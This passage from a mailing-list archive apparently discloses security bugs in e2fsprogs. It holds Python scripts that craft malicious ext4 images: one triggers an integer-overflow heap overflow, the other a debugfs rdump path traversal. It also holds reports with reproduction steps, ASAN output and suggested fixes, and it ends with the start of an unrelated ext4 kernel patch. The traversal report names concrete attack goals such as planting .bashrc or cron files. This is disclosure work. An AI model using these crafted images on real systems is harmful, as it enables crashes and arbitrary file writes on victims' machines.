OFF_CHECKSUM_TYPE      = 0x175  # __u8
OFF_BLOCKS_COUNT_HI    = 0x150  # __u32
OFF_RESERVED_GDT_BLOCKS = 0xCE # __u16

# Feature flags
EXT2_FEATURE_INCOMPAT_FILETYPE = 0x0002
EXT3_FEATURE_INCOMPAT_EXTENTS  = 0x0040
EXT4_FEATURE_INCOMPAT_64BIT    = 0x0080
EXT4_FEATURE_INCOMPAT_FLEX_BG  = 0x0200
EXT2_FEATURE_RO_COMPAT_SPARSE_SUPER = 0x0001
EXT2_FEATURE_RO_COMPAT_LARGE_FILE   = 0x0002
EXT4_FEATURE_RO_COMPAT_HUGE_FILE    = 0x0008
EXT4_FEATURE_RO_COMPAT_GDT_CSUM     = 0x0010
EXT4_FEATURE_RO_COMPAT_DIR_NLINK    = 0x0020
EXT4_FEATURE_RO_COMPAT_EXTRA_ISIZE  = 0x0040
EXT4_FEATURE_RO_COMPAT_METADATA_CSUM = 0x0400
EXT2_FEATURE_COMPAT_EXT_ATTR   = 0x0008
EXT2_FEATURE_COMPAT_RESIZE_INODE = 0x0010
EXT2_FEATURE_COMPAT_DIR_INDEX  = 0x0020

EXT2_SUPER_MAGIC = 0xEF53
SUPERBLOCK_OFFSET = 1024


def read_u32(data, off):
    return struct.unpack_from('<I', data, off)[0]

def read_u16(data, off):
    return struct.unpack_from('<H', data, off)[0]

def write_u32(data, off, val):
    struct.pack_into('<I', data, off, val & 0xFFFFFFFF)

def write_u16(data, off, val):
    struct.pack_into('<H', data, off, val & 0xFFFF)

def write_u8(data, off, val):
    struct.pack_into('<B', data, off, val & 0xFF)


def create_crafted_image(path, size_mb=128):
    """Create a crafted ext4 image from scratch (no mke2fs dependency).

    We write the superblock, group descriptor, and minimal structures
    directly to bypass any tool-level validation.
    """
    blocksize = 65536       # 64K blocks
    log_block_size = 6      # 1024 << 6 = 65536
    inode_size = 16384      # 16K inodes
    inodes_per_group = 0x40001  # 262145

    # 1 group with 1024 blocks. Total = 1024 * 64K = 64MB
    blocks_per_group = 1024
    first_data_block = 0
    blocks_count = blocks_per_group  # 1 group
    groups_cnt = 1
    inodes_count = groups_cnt * inodes_per_group  # 262145

    # Verify the overflow
    product = (inodes_per_group * inode_size) & 0xFFFFFFFF
    inode_blocks_per_group = (product + blocksize - 1) // blocksize
    correct_ibpg = (inodes_per_group * inode_size + blocksize - 1) // blocksize

    print(f"\n=== Overflow Analysis ===")
    print(f"  blocksize         = {blocksize}")
    print(f"  inode_size        = {inode_size}")
    print(f"  inodes_per_group  = {inodes_per_group} (0x{inodes_per_group:08X})")
    print(f"  true product      = {inodes_per_group * inode_size} (0x{inodes_per_group * inode_size:X})")
    print(f"  truncated product = {product} (0x{product:08X})")
    print(f"  inode_blocks_per_group (buggy)   = {inode_blocks_per_group}")
    print(f"  inode_blocks_per_group (correct) = {correct_ibpg}")
    print(f"  groups_cnt = {groups_cnt}")
    print(f"  inodes_count = {inodes_count}")

    # Verify openfs.c checks will pass:
    # 1. s_log_block_size <= 6
    assert log_block_size <= 6

    # 2. inode_size >= 128, <= blocksize, power of 2
    assert inode_size >= 128
    assert inode_size <= blocksize
    assert (inode_size & (inode_size - 1)) == 0

    # 3. blocks_per_group >= 8
    assert blocks_per_group >= 8

    # 4. blocks_per_group <= EXT2_MAX_BLOCKS_PER_GROUP = 65528
    assert blocks_per_group <= 65528

    # 5. inode_blocks_per_group <= EXT2_MAX_INODES_PER_GROUP
    max_ipg = 65536 - (blocksize // inode_size)  # 65536 - 4 = 65532
    assert inode_blocks_per_group <= max_ipg

    # 6. EXT2_DESC_PER_BLOCK = blocksize / 32 = 2048. Non-zero.
    assert (blocksize // 32) != 0

    # 7. first_data_block < blocks_count
    assert first_data_block < blocks_count

    # 8. groups_cnt < 2^32
    assert groups_cnt < (1 << 32)

    # 9. groups_cnt * inodes_per_group == inodes_count
    assert groups_cnt * inodes_per_group == inodes_count

    # 10. Bitmap check: inodes_per_group / 8 <= blocksize
    inode_bitmap_bytes = inodes_per_group // 8
    # 262145 / 8 = 32768.125 -> integer division = 32768
    # But the check uses inodes_per_group / 8 which needs to be <= blocksize
    # Note: this is integer division in C, and 262145 is odd, so 262145/8 = 32768
    # But the bitmap needs to cover all inodes, so it should be (262145+7)/8 = 32769
    # Actually the code uses EXT2_INODES_PER_GROUP / 8 as integer division
    assert (inodes_per_group // 8) <= blocksize, \
        f"inode bitmap {inodes_per_group // 8} > blocksize {blocksize}"

    print("  All validation checks pass!")

    # Create the image
    image_size = blocks_count * blocksize
    print(f"\n  Image size = {image_size} bytes ({image_size // (1024*1024)} MB)")
    data = bytearray(image_size)

    # === Write superblock at offset 1024 ===
    sb_off = SUPERBLOCK_OFFSET

    write_u32(data, sb_off + OFF_INODES_COUNT, inodes_count)
    write_u32(data, sb_off + OFF_BLOCKS_COUNT, blocks_count)
    write_u32(data, sb_off + OFF_R_BLOCKS_COUNT, 0)
    write_u32(data, sb_off + OFF_FREE_BLOCKS_COUNT, max(0, blocks_count - 6))
    write_u32(data, sb_off + OFF_FREE_INODES_COUNT, inodes_count - 11)
    write_u32(data, sb_off + OFF_FIRST_DATA_BLOCK, first_data_block)
    write_u32(data, sb_off + OFF_LOG_BLOCK_SIZE, log_block_size)
    write_u32(data, sb_off + OFF_LOG_CLUSTER_SIZE, log_block_size)
    write_u32(data, sb_off + OFF_BLOCKS_PER_GROUP, blocks_per_group)
    write_u32(data, sb_off + OFF_CLUSTERS_PER_GROUP, blocks_per_group)
    write_u32(data, sb_off + OFF_INODES_PER_GROUP, inodes_per_group)
    write_u16(data, sb_off + OFF_MAGIC, EXT2_SUPER_MAGIC)
    write_u16(data, sb_off + OFF_STATE, 1)  # EXT2_VALID_FS
    write_u32(data, sb_off + OFF_REV_LEVEL, 1)  # EXT2_DYNAMIC_REV
    write_u32(data, sb_off + OFF_FIRST_INO, 11)
    write_u16(data, sb_off + OFF_INODE_SIZE, inode_size)
    write_u16(data, sb_off + OFF_BLOCKS_COUNT_HI, 0)

    # Feature flags: minimal. No 64bit, no metadata_csum, no journal.
    feat_compat = 0  # nothing
    feat_incompat = EXT2_FEATURE_INCOMPAT_FILETYPE
    feat_ro_compat = (EXT2_FEATURE_RO_COMPAT_SPARSE_SUPER |
                      EXT2_FEATURE_RO_COMPAT_LARGE_FILE)

    write_u32(data, sb_off + OFF_FEATURE_COMPAT, feat_compat)
    write_u32(data, sb_off + OFF_FEATURE_INCOMPAT, feat_incompat)
    write_u32(data, sb_off + OFF_FEATURE_RO_COMPAT, feat_ro_compat)

    write_u16(data, sb_off + OFF_DESC_SIZE, 0)
    write_u8(data, sb_off + OFF_LOG_GROUPS_PER_FLEX, 0)
    write_u8(data, sb_off + OFF_CHECKSUM_TYPE, 0)
    write_u16(data, sb_off + OFF_RESERVED_GDT_BLOCKS, 0)

    # === Write Group Descriptor at block 1 ===
    # Block 0 contains the superblock (at offset 1024 within the block).
    # Block 1 is the group descriptor table.
    gdt_off = 1 * blocksize  # 65536
    # bg_block_bitmap: block 2
    # bg_inode_bitmap: block 3
    # bg_inode_table:  block 4 (only 1 block due to overflow!)
    struct.pack_into('<I', data, gdt_off + 0x00, 2)   # bg_block_bitmap
    struct.pack_into('<I', data, gdt_off + 0x04, 3)   # bg_inode_bitmap
    struct.pack_into('<I', data, gdt_off + 0x08, 4)   # bg_inode_table
    struct.pack_into('<H', data, gdt_off + 0x0C, max(0, blocks_count - 6))  # bg_free_blocks_count
    struct.pack_into('<H', data, gdt_off + 0x0E, min(inodes_count - 11, 65535))  # bg_free_inodes_count
    struct.pack_into('<H', data, gdt_off + 0x10, 2)   # bg_used_dirs_count
    struct.pack_into('<H', data, gdt_off + 0x12, 0)   # bg_flags

    # === Write a minimal root inode (inode 2) in the inode table ===
    # Inode table starts at block 4, offset = 4 * 65536 = 262144.
    # Inode 2 (root) is at index 1 (0-based), so offset = 262144 + 1 * 16384.
    # Inode 1 is special "bad blocks" inode.
    inode_table_off = 4 * blocksize
    root_inode_off = inode_table_off + 1 * inode_size  # inode 2

    # Minimal inode: directory, mode=0755
    i_mode = 0o40755  # S_IFDIR | 0755
    struct.pack_into('<H', data, root_inode_off + 0x00, i_mode)   # i_mode
    struct.pack_into('<H', data, root_inode_off + 0x02, 0)        # i_uid
    struct.pack_into('<I', data, root_inode_off + 0x04, blocksize) # i_size
    struct.pack_into('<H', data, root_inode_off + 0x1A, 2)        # i_links_count

    # Write the image
    with open(path, 'wb') as f:
        f.write(data)

    print(f"\nImage written to: {path}")
    return data


def main():
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <output_image>")
        sys.exit(1)

    output_path = sys.argv[1]

    print("Creating crafted ext4 image with inode_blocks_per_group overflow...")
    data = create_crafted_image(output_path)

    # Print superblock verification
    print(f"\nSuperblock verification:")
    sb = data[SUPERBLOCK_OFFSET:SUPERBLOCK_OFFSET+256]
    print(f"  s_inodes_count     = {struct.unpack_from('<I', sb, 0x00)[0]}")
    print(f"  s_blocks_count     = {struct.unpack_from('<I', sb, 0x04)[0]}")
    print(f"  s_first_data_block = {struct.unpack_from('<I', sb, 0x14)[0]}")
    print(f"  s_log_block_size   = {struct.unpack_from('<I', sb, 0x18)[0]}")
    print(f"  s_blocks_per_group = {struct.unpack_from('<I', sb, 0x20)[0]}")
    print(f"  s_inodes_per_group = {struct.unpack_from('<I', sb, 0x28)[0]} (0x{struct.unpack_from('<I', sb, 0x28)[0]:08X})")
    print(f"  s_magic            = 0x{struct.unpack_from('<H', sb, 0x38)[0]:04X}")
    print(f"  s_rev_level        = {struct.unpack_from('<I', sb, 0x4C)[0]}")
    print(f"  s_inode_size       = {struct.unpack_from('<H', sb, 0x58)[0]}")
    print(f"  s_feature_compat   = 0x{struct.unpack_from('<I', sb, 0x5C)[0]:08X}")
    print(f"  s_feature_incompat = 0x{struct.unpack_from('<I', sb, 0x60)[0]:08X}")
    print(f"  s_feature_ro_compat= 0x{struct.unpack_from('<I', sb, 0x64)[0]:08X}")

    # Show the overflow math
    ipg = struct.unpack_from('<I', sb, 0x28)[0]
    isz = struct.unpack_from('<H', sb, 0x58)[0]
    bsz = 1024 << struct.unpack_from('<I', sb, 0x18)[0]
    product_full = ipg * isz
    product_trunc = product_full & 0xFFFFFFFF
    ibpg_buggy = (product_trunc + bsz - 1) // bsz
    ibpg_correct = (product_full + bsz - 1) // bsz
    print(f"\n  Overflow demonstration:")
    print(f"    {ipg} * {isz} = {product_full} (0x{product_full:X})")
    print(f"    truncated to 32 bits = {product_trunc} (0x{product_trunc:X})")
    print(f"    inode_blocks_per_group (buggy)   = {ibpg_buggy}")
    print(f"    inode_blocks_per_group (correct) = {ibpg_correct}")
    print(f"    Ratio: buggy is {ibpg_correct / ibpg_buggy:.0f}x too small!")
    print(f"\n    With buggy value, only {ibpg_buggy * bsz // isz} inodes are")
    print(f"    addressable in the inode table, but the FS claims {ipg}.")
    print(f"    Any inode > {ibpg_buggy * bsz // isz} will cause an OOB read.")


if __name__ == '__main__':
    main()

[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #3: craft_path_traversal.py --]
[-- Type: text/x-python-script; name="craft_path_traversal.py", Size: 5972 bytes --]

#!/usr/bin/env python3
"""
Craft an ext4 filesystem image that triggers path traversal in
debugfs rdump.

Bug: debugfs/dump.c:265
  sprintf(fullname, "%s/%s", dumproot, name);

The 'name' comes from directory entries on the crafted filesystem.
If name contains "../" components, files are written outside the
intended dump directory.

Additionally, symlink targets are read from the filesystem (line 215/226)
and created on the host (line 242), allowing arbitrary symlink creation.

Usage:
  python3 craft_path_traversal.py output.img
  debugfs output.img -R "rdump / /tmp/safe_dir"
  # Result: file created at /tmp/traversal_proof (outside safe_dir)
"""

import struct
import sys
import subprocess


def create_base_image(path, size_mb=4):
    with open(path, 'wb') as f:
        f.write(b'\x00' * size_mb * 1024 * 1024)

    subprocess.run([
        'mke2fs', '-t', 'ext4', '-F',
        '-b', '1024',
        '-N', '128',
        '-O', '^has_journal,^extents',
        path
    ], check=True, capture_output=True)


def patch_traversal(img_path):
    """Add a directory entry with ../ in the name pointing to a regular file."""
    with open(img_path, 'r+b') as f:
        # Read superblock
        f.seek(1024)
        sb = f.read(1024)
        s_log_block_size = struct.unpack_from('<I', sb, 24)[0]
        s_inode_size = struct.unpack_from('<H', sb, 88)[0]
        s_inodes_per_group = struct.unpack_from('<I', sb, 40)[0]
        block_size = 1024 << s_log_block_size

        # Read group descriptor
        gd_offset = block_size * 2 if block_size == 1024 else block_size
        f.seek(gd_offset)
        gd = f.read(64)
        inode_table_block = struct.unpack_from('<I', gd, 8)[0]
        inode_table_offset = inode_table_block * block_size

        # Use inode 12 for a regular file with content
        target_ino = 12
        target_offset = inode_table_offset + (target_ino - 1) * s_inode_size
        f.seek(target_offset)
        inode_data = bytearray(f.read(s_inode_size))

        # Set as regular file (mode 0100644)
        struct.pack_into('<H', inode_data, 0, 0o100644)
        struct.pack_into('<H', inode_data, 2, 0)  # uid

        # Content stored in i_block (inline for small files)
        content = b'TRAVERSAL_PROOF: file written outside dump directory\n'
        struct.pack_into('<I', inode_data, 4, len(content))  # i_size
        struct.pack_into('<H', inode_data, 26, 1)  # i_links_count

        # Allocate a data block for the file content
        # Use block 100 (should be free in a small fs)
        data_block = 100
        struct.pack_into('<I', inode_data, 40, data_block)  # i_block[0]
        struct.pack_into('<I', inode_data, 28, 2)  # i_blocks (in 512-byte sectors)

        f.seek(target_offset)
        f.write(inode_data)

        # Write content to the data block
        f.seek(data_block * block_size)
        f.write(content + b'\x00' * (block_size - len(content)))

        # Now add a directory entry in root with name "../../tmp/traversal_proof"
        # This will cause rdump to write outside the dump directory
        root_offset = inode_table_offset + (2 - 1) * s_inode_size
        f.seek(root_offset)
        root_inode = bytearray(f.read(s_inode_size))
        root_block = struct.unpack_from('<I', root_inode, 40)[0]

        dir_offset = root_block * block_size
        f.seek(dir_offset)
        dir_data = bytearray(f.read(block_size))

        # Find last entry and add our traversal entry
        pos = 0
        last_entry_pos = 0
        while pos < block_size:
            inode_num = struct.unpack_from('<I', dir_data, pos)[0]
            rec_len = struct.unpack_from('<H', dir_data, pos + 4)[0]
            if rec_len == 0:
                break
            if inode_num != 0:
                last_entry_pos = pos
            next_pos = pos + rec_len
            if next_pos >= block_size:
                break
            pos = next_pos

        last_rec_len = struct.unpack_from('<H', dir_data, last_entry_pos + 4)[0]
        last_name_len = dir_data[last_entry_pos + 6]
        actual_last_size = ((8 + last_name_len + 3) // 4) * 4
        remaining = last_rec_len - actual_last_size

        # Path traversal name - goes up from /tmp/out3 to /tmp/
        entry_name = b'../../tmp/traversal_proof'
        new_entry_size = ((8 + len(entry_name) + 3) // 4) * 4

        if remaining >= new_entry_size:
            struct.pack_into('<H', dir_data, last_entry_pos + 4, actual_last_size)
            new_pos = last_entry_pos + actual_last_size
            struct.pack_into('<I', dir_data, new_pos, target_ino)
            struct.pack_into('<H', dir_data, new_pos + 4, remaining)
            dir_data[new_pos + 6] = len(entry_name)
            dir_data[new_pos + 7] = 1  # file_type = regular
            dir_data[new_pos + 8:new_pos + 8 + len(entry_name)] = entry_name

            f.seek(dir_offset)
            f.write(dir_data)
            print(f"Added traversal dir entry: '{entry_name.decode()}' -> inode {target_ino}")
        else:
            print(f"Not enough space (need {new_entry_size}, have {remaining})")
            sys.exit(1)

        # Mark inode 12 as used in bitmap
        inode_bitmap_block = struct.unpack_from('<I', gd, 4)[0]
        f.seek(inode_bitmap_block * block_size)
        bitmap = bytearray(f.read(block_size))
        byte_idx = (target_ino - 1) // 8
        bit_idx = (target_ino - 1) % 8
        bitmap[byte_idx] |= (1 << bit_idx)
        f.seek(inode_bitmap_block * block_size)
        f.write(bitmap)

        print(f"Patched image with path traversal entry")
        print(f"Trigger: debugfs {img_path} -R 'rdump / /tmp/out3'")
        print(f"Expected: file created at /tmp/traversal_proof (outside /tmp/out3)")


def main():
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <output.img>")
        sys.exit(1)

    output = sys.argv[1]
    create_base_image(output)
    patch_traversal(output)


if __name__ == '__main__':
    main()

[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #4: REPORT-inode-blocks-overflow.md --]
[-- Type: text/markdown; name="REPORT-inode-blocks-overflow.md", Size: 7015 bytes --]

# e2fsprogs: Integer overflow in inode_blocks_per_group causes heap buffer overflow

## Summary

A 32-bit integer overflow in `ext2fs_open2()` when computing
`inode_blocks_per_group` from untrusted superblock fields allows a
crafted filesystem image to cause a heap buffer overflow in any
libext2fs consumer that scans inodes (debugfs, dumpe2fs, fuse2fs, etc.).

## Affected Component

- File: `lib/ext2fs/openfs.c`, line 359-362
- Downstream crash: `lib/ext2fs/inode.c`, line 659
- Versions: all current versions including 1.47.4
- Affected tools: `debugfs`, `dumpe2fs`, `fuse2fs`, `e2image`, and any
  program using `ext2fs_open()` + inode scanning. Note: `e2fsck` has an
  additional `check_super_value` guard that catches this, so e2fsck is
  NOT affected.

## Severity

**High** — Heap buffer overflow (memcpy with negative/huge size) leading
to crash. Potential code execution with a carefully crafted image.

## Root Cause

In `ext2fs_open2()`, the inode table size per group is computed as:

```c
// lib/ext2fs/openfs.c:359-362
fs->inode_blocks_per_group = ((EXT2_INODES_PER_GROUP(fs->super) *
                               EXT2_INODE_SIZE(fs->super) +
                               EXT2_BLOCK_SIZE(fs->super) - 1) /
                              EXT2_BLOCK_SIZE(fs->super));
```

`EXT2_INODES_PER_GROUP` is `s_inodes_per_group` (`__u32`) and
`EXT2_INODE_SIZE` is `s_inode_size` (`__u16` promoted to `int`). Under C
integer promotion rules, the multiplication yields `unsigned int`
(32-bit), silently truncating results that exceed 2^32.

The validation at line 397 compares the already-truncated value:
```c
fs->inode_blocks_per_group > EXT2_MAX_INODES_PER_GROUP(fs->super)
```
This passes because the truncated value is small.

## Crash Chain

With `s_inodes_per_group = 262145` and `s_inode_size = 16384`:

1. **openfs.c:359**: `262145 * 16384 = 0x100004000` truncates to
   `0x4000 = 16384`. Result: `inode_blocks_per_group = 1` (should be
   65537).

2. **inode.c:293**: Inode scan sets `blocks_left = 1`, reads only 1
   block (4 inodes worth of data).

3. **inode.c:727**: After exhausting the buffer, `bytes_left -= inode_size`
   produces `bytes_left = -16384`.

4. **inode.c:659**: `memcpy(temp_buffer, ptr, bytes_left)` — `bytes_left`
   is `int`, cast to `size_t` becomes ~2^64 - 16384 → **massive heap
   buffer overflow**.

## Proof of Concept

### ASAN crash output

```
==8==ERROR: AddressSanitizer: negative-size-param: (size=-16384)
    #0 __interceptor_memcpy
    #1 memcpy /usr/include/aarch64-linux-gnu/bits/string_fortified.h:29
    #2 ext2fs_get_next_inode_full /src/lib/ext2fs/inode.c:659
    #3 ext2fs_get_next_inode /src/lib/ext2fs/inode.c:749
    #4 do_lsdel /src/debugfs/lsdel.c:182
```

### Reproduction

```bash
cd <e2fsprogs-source>
docker build -f Dockerfile.repro -t e2fsprogs-repro .
docker run --rm e2fsprogs-repro bash -c \
  'python3 /work/repro/craft_inode_overflow.py /work/t.img && \
   /src/debugfs/debugfs /work/t.img -R lsdel'
```

### PoC script

```python
#!/usr/bin/env python3
"""
Craft ext4 image that triggers inode_blocks_per_group integer overflow.

The key insight: s_inodes_per_group * s_inode_size must overflow 32 bits
while individually passing all validation checks in ext2fs_open2().

Values used:
  blocksize = 65536 (s_log_block_size = 6)
  s_inode_size = 16384 (power of 2, <= blocksize)
  s_inodes_per_group = 262145 (0x40001)
  Product: 262145 * 16384 = 0x100004000 → truncates to 0x4000
  inode_blocks_per_group = 1 (should be 65537)
"""
import struct
import sys

def main():
    path = sys.argv[1]
    
    BLOCKSIZE = 65536
    LOG_BLOCK_SIZE = 6
    INODE_SIZE = 16384
    INODES_PER_GROUP = 262145
    BLOCKS_PER_GROUP = 1024
    BLOCKS_COUNT = 1024
    FIRST_DATA_BLOCK = 0
    GROUPS_COUNT = 1
    INODES_COUNT = INODES_PER_GROUP * GROUPS_COUNT
    DESC_SIZE = 32

    img_size = BLOCKS_COUNT * BLOCKSIZE
    img = bytearray(img_size)

    # --- Superblock at offset 1024 ---
    sb_off = 1024
    struct.pack_into('<I', img, sb_off + 0, INODES_COUNT)       # s_inodes_count
    struct.pack_into('<I', img, sb_off + 4, BLOCKS_COUNT)       # s_blocks_count_lo
    struct.pack_into('<I', img, sb_off + 24, LOG_BLOCK_SIZE)    # s_log_block_size
    struct.pack_into('<I', img, sb_off + 28, LOG_BLOCK_SIZE)    # s_log_cluster_size
    struct.pack_into('<I', img, sb_off + 32, BLOCKS_PER_GROUP)  # s_blocks_per_group
    struct.pack_into('<I', img, sb_off + 36, BLOCKS_PER_GROUP)  # s_clusters_per_group
    struct.pack_into('<I', img, sb_off + 40, INODES_PER_GROUP)  # s_inodes_per_group
    struct.pack_into('<H', img, sb_off + 56, 0xEF53)            # s_magic
    struct.pack_into('<H', img, sb_off + 58, 1)                 # s_state = VALID
    struct.pack_into('<H', img, sb_off + 62, 1)                 # s_min_extra_isize
    struct.pack_into('<I', img, sb_off + 76, 1)                 # s_rev_level = DYNAMIC
    struct.pack_into('<H', img, sb_off + 88, INODE_SIZE)        # s_inode_size
    struct.pack_into('<I', img, sb_off + 96, 0x0002)            # s_feature_incompat = FILETYPE
    struct.pack_into('<I', img, sb_off + 100, 0x0003)           # s_feature_ro_compat
    struct.pack_into('<I', img, sb_off + 20, 1)                 # s_first
    struct.pack_into('<H', img, sb_off + 254, DESC_SIZE)        # s_desc_size

    # --- Group descriptor at block 1 ---
    gd_off = BLOCKSIZE
    inode_table_block = 3
    struct.pack_into('<I', gd_off + img, 0, 2)                  # bg_block_bitmap
    struct.pack_into('<I', gd_off + img, 4, 2)                  # bg_inode_bitmap
    struct.pack_into('<I', gd_off + img, 8, inode_table_block)  # bg_inode_table

    with open(path, 'wb') as f:
        f.write(img)

    product = INODES_PER_GROUP * INODE_SIZE
    truncated = product & 0xFFFFFFFF
    buggy_ibpg = (truncated + BLOCKSIZE - 1) // BLOCKSIZE
    correct_ibpg = (product + BLOCKSIZE - 1) // BLOCKSIZE

    print(f"Image: {path} ({img_size} bytes)")
    print(f"  {INODES_PER_GROUP} * {INODE_SIZE} = {product} (0x{product:X})")
    print(f"  Truncated to 32-bit: {truncated} (0x{truncated:X})")
    print(f"  inode_blocks_per_group: {buggy_ibpg} (should be {correct_ibpg})")
    print(f"Trigger: debugfs {path} -R lsdel")

if __name__ == '__main__':
    main()
```

## Suggested Fix

Use 64-bit arithmetic for the multiplication:

```c
// lib/ext2fs/openfs.c:359-362
fs->inode_blocks_per_group = (((unsigned long long)
                               EXT2_INODES_PER_GROUP(fs->super) *
                               EXT2_INODE_SIZE(fs->super) +
                               EXT2_BLOCK_SIZE(fs->super) - 1) /
                              EXT2_BLOCK_SIZE(fs->super));
```

Additionally, add a validation check after the computation:

```c
if ((__u64)EXT2_INODES_PER_GROUP(fs->super) * EXT2_INODE_SIZE(fs->super)
    > (__u64)fs->inode_blocks_per_group * EXT2_BLOCK_SIZE(fs->super)) {
    retval = EXT2_ET_CORRUPT_SUPERBLOCK;
    goto cleanup;
}
```

## Timeline

- 2026-06-07: Bug discovered during security audit

[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #5: REPORT-path-traversal.md --]
[-- Type: text/markdown; name="REPORT-path-traversal.md", Size: 5700 bytes --]

# e2fsprogs: Path Traversal in debugfs rdump allows arbitrary file write

## Summary

`debugfs rdump` extracts files from an ext2/ext3/ext4 filesystem image
to a local directory. Directory entry names read from the on-disk image
are not sanitized for path traversal sequences (`../`). An attacker who
provides a crafted filesystem image can cause files to be written to
arbitrary locations outside the intended extraction directory when the
victim runs `rdump`.

## Affected Component

- File: `debugfs/dump.c`, function `rdump_inode()`, line 265
- Also affects `rdump_symlink()` at line 242 (symlink target from image
  used directly in `symlink()` syscall)
- Versions: all current versions including 1.47.4

## Severity

**High** — Arbitrary file write as the user running debugfs. If run as
root (common for filesystem recovery), this is full system compromise.

## Root Cause

In `rdump_inode()`, the output path is constructed by concatenating the
dump root with the directory entry name from the filesystem image:

```c
// debugfs/dump.c:265
sprintf(fullname, "%s/%s", dumproot, name);
```

The `name` variable comes from `rdump_dirent()` which reads it directly
from the on-disk `ext2_dir_entry.name` field (line 317):

```c
// debugfs/dump.c:316-318
thislen = ext2fs_dirent_name_len(dirent);
strncpy(name, dirent->name, thislen);
name[thislen] = 0;
```

No validation is performed to reject names containing `/`, `..`, or
absolute paths. When `name` is `../../etc/cron.d/evil`, the resulting
`fullname` resolves outside the dump directory.

Additionally, `rdump_symlink()` at line 242 creates a native symlink
whose target is read from the crafted image:

```c
// debugfs/dump.c:242
if (symlink(buf, fullname) == -1) { ... }
```

This allows the attacker to also create arbitrary symlinks on the host.

## Impact

An attacker crafts a filesystem image (e.g., on a USB drive or disk
image file) containing directory entries with `../` sequences in their
names. When a user extracts the image with `debugfs -R "rdump / <dir>"`,
the attacker's files are written outside the extraction directory.

Attack scenarios:
- Plant a `.bashrc` / `.profile` in the user's home directory
- Write to `/etc/cron.d/` for persistent code execution (if run as root)
- Overwrite `~/.ssh/authorized_keys` for SSH access
- Create malicious symlinks to redirect future operations

## Proof of Concept

### Setup

Build the Docker reproduction environment:

```bash
cd <e2fsprogs-source>
docker build -f Dockerfile.repro -t e2fsprogs-repro .
docker build -f Dockerfile.victim -t e2fs-victim .
```

### Reproduction

```bash
docker run --rm -it e2fs-victim
```

Inside the container:

```bash
# Check home directory — clean
ls -la /home/victim/

# Extract "USB drive" filesystem
/src/debugfs/debugfs /usb/drive.img -R "rdump / /home/victim/extracted"

# Check again — .bashrc appeared OUTSIDE extracted/
ls -la /home/victim/
cat /home/victim/.bashrc
```

**Result:** A `.bashrc` file with attacker-controlled content appears in
`/home/victim/`, not in `/home/victim/extracted/`. The crafted directory
entry `../.bashrc` escaped the dump directory.

### Manual image crafting (without Docker)

```python
#!/usr/bin/env python3
"""Craft ext2 image with path traversal directory entry."""
import struct, subprocess, sys

IMG = sys.argv[1]

# Create normal ext2 image
subprocess.run(['mke2fs', '-t', 'ext2', '-F', '-b', '1024', '-N', '128',
                '-O', '^dir_index', IMG, '4096'], check=True, capture_output=True)

# Write a payload file
with open('/tmp/_payload', 'w') as f:
    f.write('#!/bin/bash\necho PWNED\n')
subprocess.run(['debugfs', '-w', IMG, '-R', 'write /tmp/_payload testfile'],
               capture_output=True)

# Patch directory entry: rename "testfile" → "../../tmp/escaped"
with open(IMG, 'r+b') as f:
    f.seek(1024)
    sb = f.read(1024)
    bs = 1024 << struct.unpack_from('<I', sb, 24)[0]
    isz = struct.unpack_from('<H', sb, 88)[0]
    gd_off = bs * 2 if bs == 1024 else bs
    f.seek(gd_off)
    gd = f.read(64)
    itable = struct.unpack_from('<I', gd, 8)[0]
    f.seek(itable * bs + isz)  # root inode
    ri = f.read(isz)
    rblk = struct.unpack_from('<I', ri, 40)[0]
    f.seek(rblk * bs)
    dd = bytearray(f.read(bs))
    pos = 0
    while pos < bs:
        rl = struct.unpack_from('<H', dd, pos+4)[0]
        nl = dd[pos+6]
        if dd[pos+8:pos+8+nl] == b'testfile':
            evil = b'../../tmp/escaped'
            dd[pos+6] = len(evil)
            dd[pos+8:pos+8+len(evil)] = evil
            break
        if pos + rl >= bs: break
        pos += rl
    f.seek(rblk * bs)
    f.write(dd)

# Trigger: debugfs <IMG> -R "rdump / /tmp/safe"
# Result: /tmp/escaped is created outside /tmp/safe/
```

## Suggested Fix

Validate directory entry names in `rdump_dirent()` and `rdump_inode()`
before using them to construct host filesystem paths. Reject names
containing:
- `/` (slash) anywhere in the name
- `..` as a path component
- NUL bytes

Additionally, validate symlink targets in `rdump_symlink()` to prevent
creating symlinks pointing outside the extraction directory.

Example fix for `rdump_dirent()`:

```c
static int rdump_dirent(struct ext2_dir_entry *dirent, ...) {
    ...
    thislen = ext2fs_dirent_name_len(dirent);
    strncpy(name, dirent->name, thislen);
    name[thislen] = 0;

    /* Reject path traversal in directory entry names */
    if (strchr(name, '/') || strcmp(name, "..") == 0 ||
        strstr(name, "../") || strstr(name, "/..")) {
        com_err("rdump", 0,
                "skipping entry with path traversal: %s", name);
        return 0;
    }
    ...
}
```

## Timeline

- 2026-06-07: Bug discovered during security audit

^ permalink raw reply

* [RFC PATCH] ext4: fix false-negative overwrite check for DIO spanning extent boundaries
From: Peng Wang @ 2026-06-07 12:49 UTC (permalink / raw)
  To: tytso, adilger.kernel, libaokun, jack, ojaswin, ritesh.list,
	yi.zhang
  Cc: linux-ext4, inux-kernel, Peng Wang

ext4_overwrite_io() decides whether a direct I/O write is an overwrite
(all target blocks already allocated) so the write can proceed under a
shared inode lock.  It calls ext4_map_blocks() once and returns false
if the mapped length is shorter than the requested length.

ext4_map_blocks() maps at most one extent per call.  When a write
straddles two extents (e.g. a written extent and an adjacent unwritten
extent created by fallocate), the single call returns only the first
extent's length.  ext4_overwrite_io() then mis-classifies the write as
non-overwrite and forces the caller to cycle i_rwsem from shared to
exclusive.

On workloads where a DIO writer appends through a fallocated region
while a DIO reader tails the same file, every write that crosses a
written/unwritten extent boundary triggers an exclusive lock
acquisition.  The writer must wait for the reader's shared lock to be
released, and while waiting the RWSEM_FLAG_WAITERS bit blocks all
other shared acquirers.  This serialises all writers to queue-depth 1
and throughput collapses.

Fix by looping ext4_map_blocks() over the remaining range.  As long as
every queried extent reports allocated blocks (written or unwritten),
the function returns true and the write keeps the shared lock.

The *unwritten output now uses OR semantics across extents: set if any
block in the range is unwritten.  This is correct for the two callers:

 - (unaligned_io && unwritten) takes the exclusive lock, which is
   needed if any block requires partial-block zeroing.
 - (ilock_shared && !unwritten) selects ext4_iomap_overwrite_ops,
   which skips journal transactions and is only safe when every block
